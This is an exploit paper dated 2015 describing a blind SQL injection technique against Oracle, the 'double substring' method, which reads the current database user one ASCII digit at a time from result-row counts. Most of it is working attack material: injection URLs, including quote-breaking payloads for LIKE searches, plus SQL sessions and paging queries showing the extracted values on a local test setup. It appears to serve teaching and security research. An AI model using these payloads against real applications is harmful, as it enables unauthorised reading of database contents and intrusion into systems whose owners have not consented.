####################################################################
# Title: Content-based Blind Injection Using By Double Substring
# Date: 2015.09.23
# Author: zamteng [jang6263@gmail.com]
# Vendor Homepage: hackerstory.org
# Tested on: Oracle 10g Express Edition Release 10.2.0.1.0
####################################################################


####################################################################
# [0] Basic Concepts
####################################################################
Blind SQL injection is a type of SQL Injection attack that asks 
the database true or false questions and determines the answer 
based on the applications response (Content-based, Time-based)
In generally, Content-based Blind SQL injection should have the data
# Example Of Content-based Blind SQL injection
http://localhost/test.jsp?keyword=1 and 1=1 [TRUE - One or more output]
http://localhost/test.jsp?keyword=1 and 1=2 [FALSE - No output]

If the data is more than the nine, using the Double Substring can attack
# Example Of Content-based Blind Injection Using By Double Substring
http://localhost/test.jsp?keyword=1 and 1=1 [TRUE - Nine or more output]
http://localhost/test.jsp?keyword=1 and 1=2 [FALSE - No output]

# The Comparison of ascii code size(larger or smaller) need 7 requests
# The shift(bitand) operation need 7 requests (link - https://www.exploit-db.com/papers/17073/)
# The Double Substring Attack need 2 or 3 requests (Most DBMS capable of pagin query)

####################################################################
# [1] Content-based Blind Injection Using By Double Substring
####################################################################
http://localhost/test.jsp?keyword=1 and rownum <= (substr(ascii(substr(user,1,1)),1,1))--
# The result count is eight

http://localhost/test.jsp?keyword=1 and rownum <= (substr(ascii(substr(user,1,1)),2,1))--
# The result count is three

# CURRENT DATABASE USER NAME's first character is 'S'
# You can find out one character through  twice or three times Request

####################################################################
# [2] Sample Source
####################################################################
It was tested on Oracle XE 10.2.0.1.0

# create TABLE
SQL> create table t_user (id number(4), name varchar2(30));


# insert DATA
SQL> insert into t_user values(1,'janghw01');
SQL> insert into t_user values(2,'janghw02');
SQL> insert into t_user values(3,'janghw03');
SQL> insert into t_user values(4,'janghw04');
SQL> insert into t_user values(5,'janghw05');
SQL> insert into t_user values(6,'janghw06');
SQL> insert into t_user values(7,'janghw07');
SQL> insert into t_user values(8,'janghw08');
SQL> insert into t_user values(9,'janghw09');
SQL> commit;

# current database user name (by Oracle)
SQL> select user from dual;

USER
------------------------------------------------------------
SYSTEM

# current database user name's first ascii character
SQL> select ascii(substr(user,1,1)) from dual;

ASCII(SUBSTR(USER,1,1))
-----------------------
                     83

# first ascii character's total count
SQL> select * from t_user where 1=1 and rownum <= (substr(ascii(substr(user,1,1)),1,1));

        ID NAME
---------- ------------------------------------------------------------
         1 janghw01
         2 janghw02
         3 janghw03
         4 janghw04
         5 janghw05
         6 janghw06
         7 janghw07
         8 janghw08

8 rows selected.

# second ascii character's total count
SQL> select * from t_user where 1=1 and rownum <= (substr(ascii(substr(user,1,1)),2,1));

        ID NAME
---------- ------------------------------------------------------------
         1 janghw01
         2 janghw02
         3 janghw03


####################################################################
# [3] Attack Examples
####################################################################
# request in like search
http://localhost/test.jsp?keyword=%' and rownum <= (substr(ascii(substr(user,1,1)),1,1)) and '%'='
http://localhost/test.jsp?keyword=%' and rownum <= (substr(ascii(substr(user,1,1)),2,1)) and '%'='

# sample paging query (must be nine or more count output)
SELECT *
  FROM (SELECT ROWNUM AS rnum, z.*
          FROM (SELECT   *
                    FROM t_user
                   WHERE name like '%[keyword]%'
                ORDER BY ID DESC) z
         WHERE ROWNUM <= 9)
 WHERE rnum >= 1

# sample paging query(result is 8 count) - The first ascii code of the first character is 8
SELECT *
  FROM (SELECT ROWNUM AS rnum, z.*
          FROM (SELECT   *
                    FROM t_user
                   WHERE name like '%%' and rownum <= (substr(ascii(substr(user,1,1)),1,1)) and '%'='%'
                ORDER BY ID DESC) z
         WHERE ROWNUM <= 9)
 WHERE rnum >= 1

# sample paging query(result is 3 count) - The secode ascii code of the first character is 3
SELECT *
  FROM (SELECT ROWNUM AS rnum, z.*
          FROM (SELECT   *
                    FROM t_user
                   WHERE name like '%%' and rownum <= (substr(ascii(substr(user,1,1)),2,1)) and '%'='%'
                ORDER BY ID DESC) z
         WHERE ROWNUM <= 9)
 WHERE rnum >= 1